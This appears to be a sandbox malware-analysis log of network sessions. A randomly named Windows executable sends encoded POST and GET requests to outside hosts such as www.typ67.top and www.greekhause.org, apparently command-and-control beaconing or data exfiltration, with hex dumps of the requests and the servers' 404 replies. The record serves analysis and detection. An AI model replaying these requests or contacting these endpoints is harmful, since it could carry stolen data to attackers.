                                                                                                                                              Oct 4, 2024 08:08:21.799927950 CEST1289INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29
                                                                                                                                              Data Ascii: div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if (
                                                                                                                                              Oct 4, 2024 08:08:21.799958944 CEST1289INData Raw: 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f
                                                                                                                                              Data Ascii: All( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var d
                                                                                                                                              Oct 4, 2024 08:08:21.800012112 CEST485INData Raw: 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65
                                                                                                                                              Data Ascii: eElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true,


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              22192.168.11.204975238.47.207.146804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:27.220604897 CEST798OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                                                                              Oct 4, 2024 08:08:27.522332907 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              23192.168.11.204975338.47.207.146804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:30.061762094 CEST818OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                                                                              Oct 4, 2024 08:08:30.383661985 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:30 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              24192.168.11.204975438.47.207.146804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:32.904025078 CEST2578OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 4f 34 58 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzRE49929KVxCutzbd6wjUS8CBzp4B6zlttdQww+HnU9A5g7vHYqfrxFAxSMrDZQoyVZGOwiWqKMx/ZF1c5ubvR6DVsIoDVpVusxcOVnOt4T6PZxsPNagrPQcRDRv9zsjpaFCnGxUleSCGR6hVVmFjPdENiKPedyzoFLRzR8cO5x2BuuiU3lI7EFL1tWS9c2xds0Iyqvhj1HkyR/jliuVvQ03wwHlvW8qo50HS9lahZh8Va3Y8uytYYI0lVILVFrP4H+/LvGw9i7LN0eC2qCvUwl6CH25R9OWjHCO4XkJLM8ZRB0VY8YspLIqcTnw+1OEROyGubT0MQZW8v2/QNZnxm0ZJZt+CBdwl82pfNFtbD2qt4hNgNgbDpb/N3FDrGfupmkanNH6ZjyX46NhZu7zvZfm0fbwc2ckrsDV09OBGOk6Qh17Mwi4rLWYB9g1QNULoVfg6kaBMM5xdBjv2XPZOpmE1i0cv0higHSS9AeS3fUYfPCQDFpRxWigflZ0ZbQnuQ+BuKpimW/0xtVSzclHj0KB58NmkgmWkeE0R0VNSp8jqIS9EYvfTzR4QWIY7mLiQSnI4k0WuqtzBB83KqKUTPttvnj+b7BAPAcjA4E3aEd1+a625Up5Q+ozlwJi8xd1cSD+PTfqBg6Wq9kKffO6W5mXfif+MQFRQSOlAVoKphQhTIrZ7sCOAHHOkDwOh93/IMabDJQQX+Q6oCOqslG8kQDhWgy0pcOPjrv0yjQUiwXALS4TxA+NXKfo0iXNeX+jwcfeqTbJCmx3Q5gGynVKKWmDER1mnWlUXYqAujtb0/seXbnjU5Ggvj9aOm2SbpAxDgHhCkstYoJ0k+KVJEe2NJC1/dodBZc/8E+QFCt1j9I6YLCF1o4LzsUxEkEr/C1+KS9xflxoplyTcTN1SLdHtw7ceLtx9/XvqFUGn+nWOxHigZMrnWhr8kmW2EPNjJc9CPJCCxi/ [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:08:32.904107094 CEST5389OUTData Raw: 4f 74 6a 76 53 55 5a 6c 70 33 76 43 77 56 43 4a 4f 4c 6e 70 79 67 7a 78 41 51 41 6b 64 70 42 2f 6e 53 77 42 6c 59 45 63 35 72 55 54 50 67 4f 51 69 51 2f 78 31 64 6a 79 57 54 79 77 77 79 47 2f 42 79 44 74 68 63 70 46 7a 62 54 57 71 78 6d 4d 59 78
                                                                                                                                              Data Ascii: OtjvSUZlp3vCwVCJOLnpygzxAQAkdpB/nSwBlYEc5rUTPgOQiQ/x1djyWTywwyG/ByDthcpFzbTWqxmMYxYZhBtBkN90P7o9FbiQWNM4DkJSflz1102u4Gy6SDK/OeEzEUeexo7mG2aShr6kPdh71ke6yaC157QcKQowvw2j0FLUg8lI1+WmtqyPfQ63aqzpgNR+mZr6NsCLWCICEVs5f15ZhlG0gQ59DKgPgCR3DrEJwKjX3KX
                                                                                                                                              Oct 4, 2024 08:08:33.205120087 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:33 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              25192.168.11.204975538.47.207.146804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:35.743563890 CEST544OUTGET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:36.133718967 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:35 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              26192.168.11.20497563.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:41.435738087 CEST813OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              27192.168.11.20497573.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:44.070035934 CEST833OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              28192.168.11.20497583.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:46.709666014 CEST3867OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f 4f 6c 6d [TRUNCATED]
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5dLQPNRckXb6CrbIEjqjBypH6Sf/pKcFUEJR1QCdfXukY0azISPdRvokz2zxJ9ZyNky1iMFu1WQc71oc3ftnfyNKuPK7kIb3wifIw5WkiJuTKXdIe8qchwGy4AdEPwXTCqTc37kZFOItUFvy2Y4MzDePvV02pTLk6/CY6+M7BSDFCpaLy3zOyUsGONBhLbmL31K1QB8OrnLSB+HB8RnFFaasTrfP8f2MLMWzEyOyfvcfZ/FjYNNgfrntOZCribMBbq1PM47B4GmeQp0ZGL3oy5yaXN1kXpkEA1OOlmitVwWHvmaJAVRZvnSNOxBHDHsxnlEO257vRGubM7GjRZ42HwWn2pt64zlx64P5v7flDAk09YOWsXJwP6sdmsy31E3bm7e1R/n7GRHrPQr//xJf7d1zTmDxm5h/sPyXq5K0Omns47EixUnJKX3JAemqUfISWOGhXgJ5TtAqv8jbRyUKzHRhUdN8HRZT2Vc1u5ki//mtisMTv7fUU5ouwUOniIy9pxsksV2rQQ2UvsZDXErautIEMBPWtCO0UAzQJ5d/YmsqKBbo7T+hoU5J+5DHeIpEiVPLPFZvDL3w7Zazr+wpfTfTIXAoc9c+8syyfLkIXt6AU7yIwmdpt2hyeyejVA3VCkzB8ZPK5RcSREEOvX+aHGLv0Xeqk8N3rBA1IYWy8brq4Yavsmoc7A+4bVFuxF1XKFN3MJLxzvWEmdDXS45sMqgT/sAQYm4x/T5tsMHj29EAHfaz4zWhUWPduz9CoczxTnTKNAPwfYD9jeWfqrDxRt0iD//AfydCgrYmpcMCPUOyt1JhgHE1T66f2el5l22jc36Umcn7DYnq15Cmf4iw3Sfq0PWluZwpqTK6rq43fJIa/ks8y3cmOAdOofzpBTaRz3sjvafhJXgnUf9QnrXEpwnOc1WBzx0ekQUMYkEG490ZA0LkLLQmtMOB/jfb4bpyDD/kUwoc [TRUNCATED]
